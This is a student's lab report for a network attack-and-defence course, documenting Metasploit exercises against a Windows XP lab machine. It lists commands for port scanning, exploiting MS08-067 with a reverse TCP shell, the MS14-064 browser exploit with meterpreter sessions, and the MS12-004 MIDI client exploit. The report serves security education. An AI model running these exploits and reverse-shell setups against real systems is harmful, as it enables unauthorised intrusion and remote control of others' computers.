20202409 2022-2023-2 《网络与系统攻防技术》实验六实验报告
1.实验内容
本周实验内容主要是学习metasploit的使用方法,并完成一些实践任务。重点有以下三种常用的攻击方式和思路:
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
要求须成功应用任意一个辅助模块。
2.实验过程
2.1主动攻击
本次实践通过检测网络服务漏洞来实施主动攻击。我们利用metasploit辅助模块检测靶机开放的端口来搜寻可能存在的漏洞,然后利用它的攻击模块进行攻击测试。
1.在kali虚拟机上ping目标靶机,可ping通:
2.使用msf辅助模块portscan来探测靶机的开放端口:
//开启metasploit交互终端
service postgresql start
msfdb init//已初始化过的可以运行命令msfdb run,效果等同于msfdb start + msfconsole
msfconsole
//搜索辅助模块portscan,选择对tcp端口进行扫描的模块
search portscan
use 5
*2.设置需要的参数,主要是靶机IP,可以多设些线程,提高运行速度,开启扫描,发现xp靶机开放了tcp135、139和445端口:
set RHOST 192.168.197.136
set THREADS 10
show options
run
3.注意到445端口开放,可利用ms08-067漏洞模块进行攻击,可用以下命令检测主机是否可被攻破。结果显示vulnerable,我们开始着手使用该模块作渗透测试。
nmap -p 445 192.168.197.136 --script=smb-vuln-ms08-067
4.进入metasploit交互终端,搜索ms08-067模块,并运用该模块。
search ms08-067
//搜索到一个结果,其编号为0
use 0
5.设置payload为generic/shell_reverse_tcp,和RHOST为靶机ip,并检查设置。
set payload generic/shell_reverse_tcp
set RHOST 192.168.197.136
show options
6.启动渗透,可以成功获得xp靶机的shell(对老版windows命令不太熟悉,试错了好多):
run //或者exploit
2.2针对浏览器的攻击
在metasploit中搜索browser相关的模块,选取rank高的进行渗透测试,多次尝试均失败,ie浏览器会在渗透过程中关闭进程,原因不明。参考了学姐的博客,我改用ms14_064_ole_code_execution进行渗透测试,第一次失败,紧接着第二次换了一个端口竟然成功了,unbelievable!
1.转到ms14_064_ole_code_execution模块,填写相关参数:SRVHOST、LHOST、LPORT、AllpwPowerShellPrompt,检查相关参数设置。
use exploit/windows/browser/ms14_064_ole_code_execution
set SRVHOST 192.168.197.130
set AllowPowerShellPrompt true
set LHOST 192.168.197.130
set LPORT 9024
show options
2.启动测试,获得一段用于攻击的网址,用靶机的IE浏览器访问它。
exploit
2.等待一段时间后,会话新建成功,选择进入一个会话,成功获取靶机shell。
exploit
//meterpreter成功新建一个会话
sessions//列出所有会话
session -i 1//转到第一个会话,成功获取shell,可以执行相关命令
2.3针对客户端的攻击(ms_12_004)
本次实践针对xp系统的windows media player所带有的漏洞,利用metasploit的ms_12_004_midi模块对靶机进行渗透测试,我们可以获取系统权限,弹出运行计算机程序。
1.搜索并进入相应的模块,设置参数如下:
set payload windows/exec
set cmd calc.exe
set URIPATH auto
show options
2.exploit运行,复制网址,粘贴入靶机IE浏览器搜索栏搜索。结果:xp靶机弹出计算机程序。
3.问题及解决方案
问题1:中文版xp系统永恒之蓝漏洞复现无法完成
问题1解决方案:重装原版(英文版)的xp系统
问题2:exploit后出现address already in use
问题2解决方案:问题的出现伴随着所种可能性:1.参数配置有问题,需要理解参数的具体含义,避免配置错误;2.kali主机的监听端口被占用,有两种选择:杀死占用端口的进程,或者更换监听端口。
4.学习感悟、思考等
本次实验也花了很多时间去完成,依然拖到了实验课的下一周才彻底结束,过程中不是很顺利,碰到了各种各样的问题。但是,碰到问题实在太正常了,顺利也不是能够苛求的,终归也从中学到了不少知识,还磨炼了自己应对困难的心态。本次实验主要是基于metasploit,操作起来毫无难度,理解原理才应该是重头戏。可是,我感觉自己尚未有严肃研究某个漏洞的基础,在metasploit渗透框架下,我就如孩童一样只是在“玩”这些漏洞而已,希望能够趁热打铁,努力提高自己的水平,作为一个网络空间安全专业的学生,这是难以推脱的使命。
参考资料
1.Metasploit渗透测试基础
2. Metasploit主动攻击
3. 针对浏览器的攻击
4. 针对客户端的攻击